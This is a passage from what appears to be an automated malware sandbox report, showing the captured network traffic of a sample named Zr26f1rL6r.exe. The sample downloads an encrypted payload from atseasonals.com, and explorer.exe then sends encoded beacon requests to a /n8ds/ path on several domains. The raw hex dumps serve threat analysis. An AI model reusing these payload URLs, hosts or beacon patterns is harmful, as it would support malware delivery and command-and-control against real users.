<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><title>The domain name is registered</title><meta name="robots" content="noindex, nofollow"><meta http-equiv="Content-Type" content="text/html; charset=windows-1250"><meta name="description" content="FORPSI je Evropsk housingov spolenost. Nabz sluby webhostingu, serverhostingu, registrace domnovch jmen a www strnky na serverech Windows/Linux."><meta name="keywords" content="forpsi,webhosting,domna,domny,hosting,server,serverhosting,housing,serverhousing,adsl,wifi,wi-fi,domain,domains"><style type="text/css">...html, body {margin: 0px;padding: 0px;height: 100%;background-color: #32549c;}#container {height: 100%;width: 100%;text-align: center;}#box {width: 520px;position: relative;margin: 0 auto;top: 160px;border: 4px solid #cccccc;background-color: #FFFFFF;background-image: url(img/logo_forpsi.gif);background-repeat: no-repeat;background-position: left top;padding: 20px;font-family : Verdana, Arial, Helvetica, sans-serif;font-size: 14px;color: #38506b;}#box2 {width: 520px;position: relative;margin:
Nov 25, 2021 12:56:28.576960087 CET	6426	IN	Data Raw: 30 20 61 75 74 6f 3b 0d 0a 09 74 6f 70 3a 20 31 36 30 70 78 3b 0d 0a 09 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 63 63 63 63 63 63 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 09 Data Ascii: 0 auto;top: 160px;border: 4px solid #cccccc;background-color: #FFFFFF;padding: 20px;font-family : Verdana, Arial, Helvetica, sans-serif;font-size: 14px;color: #38506b;}#flag {position: absolute;left: 95px;top
Nov 25, 2021 12:56:28.577003002 CET	6426	IN	Data Raw: 61 63 75 74 65 3b 4e 41 20 4a 45 20 5a 41 52 45 47 49 53 54 52 4f 56 26 41 61 63 75 74 65 3b 4e 41 3c 2f 74 64 3e 0d 0a 20 20 3c 2f 74 72 3e 0d 0a 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 66 6c 61 Data Ascii: acute;NA JE ZAREGISTROVÁNA</td> </tr> <tr> <td><img src="img/flagSk.png" /></td> <td class="txt">DOMÉNA JE ZAREGISTROVANÁ</td> </tr> <tr> <td><img src="img/flagPol.gif" /></td> <td class="tx

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49817	164.155.212.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:56:34.061800957 CET	6427	OUT	GET /n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z HTTP/1.1 Host: www.ayudavida.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:56:34.717901945 CET	6428	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.20.1 Date: Thu, 25 Nov 2021 11:56:34 GMT Content-Type: text/html; charset=gbk Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 Location: /404.html Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49818	172.120.157.187	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:56:39.949610949 CET	6429	OUT	GET /n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z HTTP/1.1 Host: www.stylesbykee.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:56:40.114429951 CET	6429	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Nov 2021 11:56:30 GMT Content-Type: text/html Content-Length: 801 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e b3 a4 c9 b3 ce cf b6 d9 bf c6 bc bc b9 c9 b7 dd d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49819	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:56:50.191874981 CET	6431	OUT	GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1 Host: www.inklusion.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:56:50.203358889 CET	6431	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 25 Nov 2021 11:56:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49820	203.170.80.250	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:57:06.036454916 CET	6432	OUT	GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1 Host: www.mackthetruck.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49812	107.6.148.162	443	C:\Users\user\Desktop\Zr26f1rL6r.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-25 11:54:54 UTC	0	OUT	GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: atseasonals.com Cache-Control: no-cache
2021-11-25 11:54:54 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 11:54:54 GMT Server: Apache Last-Modified: Wed, 24 Nov 2021 12:20:38 GMT Accept-Ranges: bytes Content-Length: 167488 Connection: close Content-Type: application/octet-stream
2021-11-25 11:54:54 UTC	0	IN	Data Raw: 70 99 d0 d2 81 fc a4 8c 6e ba 05 d0 4f 67 65 7f 4e 1e 4a f3 03 49 ab 4d f8 3b 67 96 a3 b5 f7 07 46 d9 a0 8b 7f 32 0c 43 a2 5a 42 b2 12 de b0 f4 94 d3 dc 46 6c cf 8e 15 59 63 2a 6b 99 39 71 c3 a8 94 6c 4a 84 13 81 5d 6a 1e 54 51 46 ba f1 ed d4 08 c0 6b 8d b8 64 71 ec 91 c7 1a 01 6d 7f 49 a6 3a 51 3c d1 ca 0c 98 4f 06 47 24 6b ec 56 9c d7 39 29 7f 90 8f 10 2b ff c6 eb 49 87 e7 e0 70 77 e6 54 c0 aa f3 4b 59 89 c0 66 fa 8f 90 47 e4 0a 64 47 b5 d4 b5 71 92 58 65 b7 82 12 15 37 dd 6f c2 ec 2e 2b df 1d cf 2c 5e 7a d8 f2 d7 16 ec 09 81 e5 9d 39 0d e2 1d d4 71 ba ff de 2e 9b 03 5e 74 c4 af 5c 6d 82 2a 3a fb 21 10 13 c5 ce 56 69 4f 4e 29 b7 4f 90 af e9 9a cd 2d 39 69 e5 2b 66 10 5b b4 5e 9d e0 b1 b1 c0 09 52 76 c0 87 33 99 a3 bb ca 51 43 75 54 5b 4e a0 ab 74 91 19 Data Ascii: pnOgeNJIM;gF2CZBFlYck9qlJ]jTQFkdqmI:Q<OG$kV9)+IpwTKYfGdGqXe7o.+,^z9q.^t\m:!ViON)O-9i+f[^Rv3QCuT[Nt
2021-11-25 11:54:54 UTC	8	IN	Data Raw: 8e bc 4e ec 48 d6 a2 16 02 23 e6 e8 1f c6 a2 f1 87 bf bc dc f2 e5 1d 71 93 43 e5 f8 66 89 73 ea 07 49 9d 46 cf 62 29 04 b0 e9 ff 10 16 06 87 4d 38 5b 62 65 fc dc 00 f5 ba 79 ad 56 32 fd 03 8f fb 4b a3 5d d9 ce 81 4a 9e 3d 17 f4 d2 a1 c7 87 3d fd 91 4b 9a 13 dd 39 3b e3 c6 4f 06 1c 79 d3 83 26 00 53 1b 67 5c 44 5b d7 c5 62 93 8e 6f 5e 54 c7 c8 d9 a6 d5 ad 5a 6e da 10 69 c7 77 c2 68 d5 b1 0a 47 90 e0 8d 6a c4 32 66 27 47 62 84 7f 3d 22 1c 03 85 6c ab 59 45 eb 4f 70 ed 38 f2 31 d8 5d 7f f7 6a d4 8d e0 3d 2c 94 bd bd 34 7c 13 68 7f d2 e5 fe c7 04 85 50 1c bd f6 f8 38 d0 29 78 5b 26 a9 d3 c5 eb 01 5f 8a aa 88 23 3f 9d 0e a8 06 f9 96 8b 3e 21 23 9c 5b 82 da cd 2b 99 a0 fe 37 cb c6 17 31 d1 3e 34 39 7e 3f 48 2b bc 10 99 e2 7e 1d 53 6c e7 67 00 b8 4c cb 8f 35 3c Data Ascii: NH#qCfsIFb)M8[beyV2K]J==K9;Oy&Sg\D[bo^TZniwhGj2f'Gb="lYEOp81]j=,4\|hP8)x[&_#?>!#[+71>49~?H+~SlgL5<
2021-11-25 11:54:54 UTC	15	IN	Data Raw: 17 ca c7 b5 b0 fd 86 d4 50 e2 18 b0 be fc 2c 30 5c 16 11 88 54 5e c2 28 df 35 9a e5 69 10 10 31 89 2f e6 ff 54 6f a8 c6 95 52 74 48 c3 55 81 2d a3 39 d4 90 8c de 8f ac 70 eb d0 5c 9a b4 cb c6 df e5 6e 92 bb e0 07 43 df 69 24 b6 a3 ff 52 4d 29 ca 8f 99 4e 68 fd 8d 02 21 f9 01 4f d0 f8 f4 b2 d7 01 9e 4f 32 70 2f 03 53 61 cf 97 3d 62 d8 cb 03 51 97 a7 1f fa e3 e0 00 ae 92 0e 09 13 96 7e 52 65 3e 2c 36 85 a9 5f 75 e6 c6 6b 89 c3 66 55 25 98 6d c9 f0 bf 96 47 05 9a 61 2d 1b 23 3c d2 96 92 82 cd d6 ba 3e e6 4b 58 a5 48 1a 87 7a 4e a4 a1 b0 2f c4 55 d6 16 76 a6 7e 33 3e 12 d9 fe 29 5c 1b e6 13 d5 ac a1 ad c2 77 9a 02 73 8b ad 40 f6 2c 55 64 27 90 b5 a5 e4 a9 df 87 eb b3 1f 0e 25 a1 6a 1c 00 e9 16 a1 dc 22 2a cc fc 49 cb 9d 4b 61 fc 33 db 5f 43 37 03 c7 17 86 ac Data Ascii: P,0\T^(5i1/ToRtHU-9p\nCi$RM)Nh!OO2p/Sa=bQ~Re>,6_ukfU%mGa-#<>KXHzN/Uv~3>)\ws@,Ud'%j"*IKa3_C7
2021-11-25 11:54:54 UTC	23	IN	Data Raw: 5e 04 43 a7 80 c5 2e bc ac 30 1b fd 04 75 d2 7b c3 ff 8f b3 94 45 75 96 b0 c1 0e c5 b4 fe 2c b1 ea f1 19 bc 38 04 74 40 f6 58 cf 71 0f 1d 37 59 d4 56 20 d6 3b 0b 08 06 2b 25 af 1c e8 5d 25 2b a9 a9 84 c0 fc 5c 15 9e 07 91 73 db 7e b9 86 27 ec 6f ef 41 31 47 63 86 4f b4 d0 c0 7e 85 7f 34 15 92 9b a9 64 70 cc de 9f a5 6e db 3f e8 ec 35 9e a0 26 0f 59 b8 24 95 fd 58 9f 6f 6a e5 01 85 0a 0b 08 6a e0 61 43 7d 0a 70 5d d7 d5 19 95 5a d5 8c f0 37 72 50 a0 cc f8 47 f9 ef af e9 4c 94 65 65 81 fa 5c 37 a8 cb a6 7c dd a5 58 79 e1 91 0a 47 af 03 bc cf 03 e8 4d d6 93 39 65 e6 7b 6a fb 85 bc aa 46 76 d9 b3 d3 9e 04 54 9e 7f e3 4f 52 87 33 b9 08 2f a0 02 a8 b2 21 6e 07 d1 3a 84 8d 7a 08 c8 80 91 23 98 0b cb b7 03 07 3e 34 a9 c8 c4 db f6 7c 5d 81 f9 6a 58 32 78 f5 85 ae Data Ascii: ^C.0u{Eu,8t@Xq7YV ;+%]%+\s~'oA1GcO~4dpn?5&Y$XojjaC}p]Z7rPGLee\7\|XyGM9e{jFvTOR3/!n:z#>4\|]jX2x
2021-11-25 11:54:54 UTC	31	IN	Data Raw: 10 24 e9 36 49 4b 33 3f ba 8b 32 30 9e 48 46 3e 28 e7 ce c7 f9 03 d0 c0 2b f2 4b 41 2c 3a 96 8e 46 0d 63 2d d7 0b 4e d7 ba ef b6 ec 68 3b e0 4e de 91 bd dc 1b d2 04 7c c0 14 44 a9 bf 32 ea 46 fa 70 92 bb e4 c5 95 17 c9 a0 2b 0a 81 c4 0d 82 88 14 16 3b 92 db 30 c5 f8 f6 f5 b3 c6 8c ba b6 c4 91 6a 02 82 a5 9b 20 f9 72 f0 00 6f 46 3d 6c 9b f0 19 de 6a 19 23 92 bb 0b fb 12 49 d8 d1 4e 31 fa ca 64 ef 07 91 de 08 9e f0 1b c4 57 59 a7 89 e0 ea d6 40 3c d5 1e d7 ea 6e c0 f1 67 de c3 ef c4 80 61 ac 13 a5 fa 22 90 53 e0 43 11 ec c3 e9 c4 f0 78 10 cd eb 15 6c 89 de e4 fe da 0c 85 a1 7c e1 ec 18 42 b4 26 ea ea 93 ec 02 99 62 cb 42 0d b1 ce c6 06 10 35 4b 6b dc 91 88 92 c5 92 42 60 e4 07 80 b6 f6 b7 dc 88 2f 35 f3 c9 a7 ca 6e 25 6b 6f 92 8c 5a ac 9d 81 6f 70 42 41 83 Data Ascii: $6IK3?20HF>(+KA,:Fc-Nh;N\|D2Fp+;0j roF=lj#IN1dWY@<nga"SCxl\|B&bB5KkB`/5n%koZopBA
2021-11-25 11:54:54 UTC	39	IN	Data Raw: 8c e2 92 21 9f f8 12 80 71 84 bb 0d 80 91 03 cc 26 88 73 33 ec 1a dd b9 91 14 4c 37 25 ba 25 7e ef 29 a1 28 6c c5 3d bb 07 44 cd e3 18 34 78 b9 e8 f0 f3 88 4f d4 cb 68 a4 fc 81 7b 7d 01 17 38 a3 f9 03 2f 47 85 af 26 e8 15 78 e9 d3 8a 28 94 95 0c e9 77 8b c1 d0 0f 3b 94 07 9b 6d 7a 2e ca fa ce 04 90 40 1e 60 b7 42 32 d7 88 60 d7 01 4c a0 5e cd 95 16 83 c1 e5 19 71 d4 ff ef b3 dc a3 40 aa 69 a1 87 79 10 75 a2 d9 c6 08 60 bc 69 b4 13 01 ef 9c b6 75 ea 17 ed 29 9a 03 a0 d6 eb b7 a5 0c 5a 64 5c a2 2b d3 cf 9f 5c 5e ac 0a d6 34 49 a4 4a a2 c7 83 ee 75 86 ae c1 67 cf 6f ca 3f 0e 9e b0 f9 e3 f9 e7 7f b7 97 3e 5b 8a a2 bb 41 14 53 f6 90 07 8e 60 df 0a f8 18 77 4c 6a 8f 8b 69 1f c7 08 6d cc 53 12 bf 2b b1 e2 4a c4 a6 d7 50 59 f2 5d 9c 2a 68 71 21 fd da 71 20 5c 63 Data Ascii: !q&s3L7%%~)(l=D4xOh{}8/G&x(w;mz.@`B2`L^q@iyu`iu)Zd\+\^4IJugo?>[AS`wLjimS+JPY]*hq!q \c
2021-11-25 11:54:54 UTC	47	IN	Data Raw: 77 74 a8 2a 4b e2 06 58 96 8d ca 8d 97 65 ff 91 4b 09 4b d8 7f 8a 8e 9a b1 7a 27 ad e7 be 0a c7 2a 84 66 f3 ed 22 14 a0 8a ab 86 86 a0 57 c7 6f 49 8f 15 82 df 06 4e ee 1b 5c 2f df ae ed cb 0c b3 38 49 dc d3 b9 ea 5e c8 37 11 ee 80 f9 3c 02 88 cf ac d7 f7 ec fc a8 71 ea 2c b6 70 94 26 40 07 5d ce 15 cb fa 24 65 43 be 34 b0 53 91 40 fd 60 7e 3a 3b 2a 60 f3 8c 2f 3f bd d9 42 87 58 a9 8f 58 3c c4 93 32 74 55 f4 6e a1 4c b1 6e 83 75 68 2a 4a 63 ea cb 02 48 d2 d8 d5 9a a0 b7 fc 06 03 1a 56 ba 3f 46 4b 5c dd a9 e8 2a 7d df fb 81 e2 7b b7 60 72 c7 5b 59 a1 35 ca e0 7f 37 65 86 21 06 3e e0 0d 95 41 ac 28 fe 43 2b 31 3d d3 fc 21 7d 45 2e f3 d0 cb b9 1f 31 33 22 df 1d 92 a1 fe 51 3d dd d7 2a 99 ee d0 7d 36 26 61 80 a9 c0 f3 18 39 8e 12 f9 c0 d1 a8 15 3d 5f 2f c9 82 Data Ascii: wtKXeKKz'f"WoIN\/8I^7<q,p&@]$eC4S@`~:;`/?BXX<2tUnLnuhJcHV?FK\}{`r[Y57e!>A(C+1=!}E.13"Q=}6&a9=_/
2021-11-25 11:54:54 UTC	55	IN	Data Raw: 93 f7 95 01 1c e9 c9 90 db 44 18 c7 57 d0 65 23 22 c6 e3 c8 e8 80 e5 ee 48 59 19 f8 44 3f 5a 75 8b ab f1 fd 5b 06 57 6a 17 2d b3 e0 72 42 bc f5 13 a7 75 1a 9a c1 ad fe 4f cd 14 9e 03 2b 88 7c 5c 2d de ce 87 bc 11 6a 59 ba 4d fb c2 82 cd 64 f5 a3 d0 35 13 1f 03 48 7d 4f 0b ae 21 9c 2e 3f af ea b2 ed b3 c9 a7 85 bf 28 3a d8 92 a5 97 f7 58 6e 54 5d 55 59 b9 c8 70 61 b3 c5 12 1d 94 99 4b 0e 46 70 95 fa 71 be 7a 19 bc 37 de 26 a5 ab 9b 17 51 14 dd 66 56 fe 0b e3 d4 a9 5b fb d2 71 2a 86 9d 04 9d 71 a0 dc f7 dd 00 fe b7 47 c8 ef 63 22 56 3c c7 bd c8 38 c9 13 86 fc 3d f0 20 87 af 9f 46 1e bd bf 5e a8 85 3e 73 78 06 b5 45 c5 62 eb 73 8f eb ec e4 1d 01 2e 4d 1c 89 c4 3d 54 c8 fe f1 95 7c 0b c4 4a 71 37 e0 19 d0 dd ba 8d e7 1d bd fb 49 18 0f 47 81 bc 97 af b3 93 75 Data Ascii: DWe#"HYD?Zu[Wj-rBuO+\|\-jYMd5H}O!.?(:XnT]UYpaKFpqz7&QfV[q*qGc"V<8= F^>sxEbs.M=T\|Jq7IGu
2021-11-25 11:54:54 UTC	62	IN	Data Raw: c0 96 49 cd 9d e3 59 af 89 f3 bf ba ca 96 50 ca eb d6 6b 0f df e2 39 a1 bb e1 71 2e dc 70 7c b3 fe b1 3d 5a dc 17 19 2b c5 8d eb ec 96 69 78 a3 1f 61 30 c4 3d f9 58 2a 3d 95 1a 3b 1d 02 8e c8 9c 35 3b 7e 33 01 91 2c 2a 2a e7 1e 0f cd 58 3e c2 7d c3 1e be 57 d0 1f 43 a8 e9 b1 e1 65 65 8f aa 09 4a 95 40 0a 95 59 2c 47 21 76 34 1d 92 67 77 b4 2e 95 22 53 5b 16 a9 33 38 85 97 9e ad c7 bd cf 33 ae fe 8a e3 4d 65 3b a0 e3 f1 b3 28 45 95 ae 00 8d 57 13 4d a2 aa e7 81 51 61 d0 3a 4f 10 b9 23 68 07 29 52 ac 1b 34 1a 61 05 ca c5 07 d4 3b 5c 3e 99 97 0f cd 2b b8 2b 47 dc 01 59 73 a3 f9 e5 7c 3f 1b 4f 39 e3 d8 ea e1 2b 3d 52 83 f5 59 f7 1d 9b 93 18 ea 77 43 8c 82 0e dd 90 bb 77 55 02 41 de 8a 0f f8 0c 72 5a 48 d7 a8 76 d4 12 f4 7a 30 0e 5a 2a c4 bb ed d6 7e f9 92 16 Data Ascii: IYPk9q.p\|=Z+ixa0=X=;5;~3,X>}WCeeJ@Y,G!v4gw."S[383Me;(EWMQa:O#h)R4a;\>++GYs\|?O9+=RYwCwUArZHvz0Z~
2021-11-25 11:54:54 UTC	70	IN	Data Raw: d9 61 6f 9a c0 da 28 6c 0e 3e cf 1c 0f cd c0 4e 75 e2 54 1f 7d 92 f6 a6 e5 a7 f5 96 5f 8a 39 27 ba 8a b0 99 c5 e0 6f f7 4e fa 16 01 e5 46 de 9b 99 66 19 1e 4a 44 f4 f9 58 fd a9 f2 38 3b 90 ca df 9e bb d7 ce 69 bc 3d fb dc 3c 66 a3 83 fc 36 c4 d7 df 90 46 f9 ed 98 c1 19 e5 92 ef 07 e3 d5 a0 c6 9e 0c 9f a1 f3 01 b6 26 8a dc 6e 40 af d8 f1 6a f2 6f 49 47 4d 9a 61 a8 50 68 a6 5e 83 b1 ea 10 ba 8f 83 79 f0 48 37 81 5d 3a 2c d7 d3 4f 62 6f 86 cc 10 4b 6b e4 46 6a 3c 85 6d 30 1a 8a fd 2e c0 e1 22 97 b9 91 35 f3 67 4f ee e9 a3 6b ec db 09 97 c6 d6 80 fa 8d 42 c3 7f 55 eb 49 b2 62 a0 8f 86 06 be 98 42 d4 c3 6b 57 f3 bf 35 86 89 96 57 6c 93 e6 c5 a6 da 7e 9a b0 78 d2 8b 73 11 59 e1 4d 0a 08 6f 0b ad 00 15 c0 e5 05 92 b6 f2 45 9f 32 67 c6 e4 ff 73 cb 17 f0 19 02 7d Data Ascii: ao(l>NuT}_9'oNFfJDX8;i=<f6F&n@joIGMaPh^yH7]:,OboKkFj<m0."5gOkBUIbBkW5Wl~xsYMoE2gs}
2021-11-25 11:54:54 UTC	78	IN	Data Raw: 9f 4f 06 44 ed 3a 67 59 cc 84 6b 7b 2d c1 d9 f8 20 b1 c6 eb c2 28 b5 b6 fb a1 11 3e 80 aa 47 c1 50 98 fd bc ce de 3a 95 60 64 17 67 4e eb 32 49 be b4 0c d6 ba f8 9e 04 71 98 1b 82 3e 4a 26 25 b9 37 fd 1b 7c cf 67 ba 33 36 67 d4 00 9a 55 17 45 a0 fa bd 7e 1f f2 d7 03 23 43 a8 de 65 00 d3 08 03 ac 26 b0 2c 8c 9f 1e c0 da e5 37 2a 35 8f e7 cb 8b 47 8d 80 aa 84 3c 1a d1 1c 19 3b 59 32 00 ee a6 ee 0b 4e c7 d6 f8 60 ad b4 4e 79 42 75 54 88 f2 ab de 03 1b 96 83 4b 6a df 54 a9 aa 6e b0 e1 59 b2 15 34 66 e8 e4 10 64 a7 08 47 f3 f3 61 15 2e 78 ed a5 b0 da 42 62 c8 f5 ec fc 71 c6 15 d3 b6 70 90 fc de b0 d8 4c 15 cb a1 22 0d 1e 81 48 b6 16 0c 62 9e ee 76 33 fb 7a 62 30 2c a9 7a 45 06 87 0c 22 52 7a 0a 6c 7d d4 5c 7b 06 25 f8 e3 42 5f 87 a5 38 68 74 4a 91 e5 5e e3 9d Data Ascii: OD:gYk{- (>GP:`dgN2Iq>J&%7\|g36gUE~#Ce&,7*5G<;Y2N`NyBuTKjTnY4fdGa.xBbqpL"Hbv3zb0,zE"Rzl}\{%B_8htJ^
2021-11-25 11:54:54 UTC	86	IN	Data Raw: bf 18 09 42 e2 32 a7 0c 30 08 90 55 a3 2b b9 b8 84 1b 45 41 c0 82 0d f4 a3 b8 a8 a1 ae bf 2b 47 44 a8 2c 5b 84 87 82 7f c9 9b 6b 1f 6d 0d b8 2e 97 55 5e a3 b2 0e 82 ab fc 9e 64 d2 e3 db 86 9e 55 b0 a9 d1 f2 bb 97 b6 96 fa 25 c7 54 b7 c9 14 13 bd 1a af 9d 05 6a aa a7 80 ec cb a8 16 a0 38 10 e8 a8 69 ce d4 d1 a9 3f 51 0b 5a 61 f5 31 26 f6 f7 f7 5b 80 8e be bc fb 2f 27 9a 5b da 49 41 39 43 cd ac 92 7a 02 0f 2b d8 c9 56 b9 b8 cf 20 50 fb 06 c6 18 70 c4 62 b4 de 90 85 2b 5f e3 7d e5 8a 74 3e 54 ff 48 54 54 be b8 3b 55 e8 b3 16 07 4a 4b ff 86 83 6a 3d 2b c7 d1 3a ff 68 e3 f2 7c ee 76 ae 25 a6 a4 93 50 16 ff 63 44 28 38 44 cb 23 44 7e be 0e 8c a1 9e 33 02 54 7b ba 5d 74 3d 0e c7 eb 9c 51 cc db 9e 55 ea f2 fa 73 c5 2e 92 50 b4 6c 89 16 c5 98 1b 85 5a 11 b1 98 fc Data Ascii: B20U+EA+GD,[km.U^dU%Tj8i?QZa1&[/'[IA9Cz+V Ppb+_}t>THTT;UJKj=+:h\|v%PcD(8D#D~3T{]t=QUs.PlZ
